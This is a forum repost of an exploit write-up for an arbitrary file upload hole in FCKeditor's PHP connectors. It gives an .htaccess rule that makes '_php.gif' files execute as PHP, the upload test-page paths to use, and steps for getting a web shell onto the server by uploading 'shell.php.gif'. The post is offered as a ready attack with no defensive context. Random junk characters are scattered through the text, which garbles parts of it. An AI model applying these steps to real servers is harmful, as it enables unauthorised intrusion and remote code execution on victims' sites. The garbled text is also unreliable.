FCKeditor所有php版本Upload上传漏洞
8 f; |+ H; s- _7 v& G" L作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:078 M$ r, O8 U* M
减小字体 增大字体2 f- K7 a: y# O: Z9 l# _
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability& Z% E' S8 @2 R' p
[+] Date: 2011
2 ~4 }; o* f9 m. _% t[+] Author : sinesafe.cn# K" \7 T' Z" R9 Y7 N1 S* V
[+] Website : WwW.sinesafe.cn
+ s. `0 Z* L6 J# v% N———————————————————+ D7 y# v- j0 k: N
1.create a htaccess file:& B; ~) P* X$ D I9 `
code:
) z" f* V9 `* |' I" F% N<FilesMatch “_php.gif”>
7 @) P9 P8 @3 q) Y& [ HSetHandler application/x-httpd-php
# a+ l/ R* ]! d2 j2 W</FilesMatch>" x8 E3 F% s( x
. g8 z$ ?0 ~6 S. `9 J8 q2 ~3 s9 X
2.Now upload this htaccess with FCKeditor.
8 ^' m) }3 a3 y5 Y( ~/ F' K4 }
1 Y; C( M; O2 M \: ?# G; hhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
$ P1 C' T4 R3 ?7 s( y |
0 P, X2 Y1 W! V* M5 Lhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html8 O. C# J3 \$ r
+ n0 E3 M9 W6 J. i5 T+ H
———————————————————————————————-
& \+ ^5 J- \1 N4 J- l* D/ V3.Now upload shell.php.gif with FCKeditor.
; y9 v# `7 i( C4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.+ [0 {( B* l1 u9 w/ W5 W8 g `
5.http://www.sinesafe.cn/anything/shell_php.gif @1 |" M) j+ G' |
6.Now shell is available from server. |
% K0 A5 f- |$ N& B( m& T! U! G, F/ d% p4 U7 K. G
: @: I: n0 Z" J' u
|
发表于 2013-10-27 17:25:21
收藏
支持
反对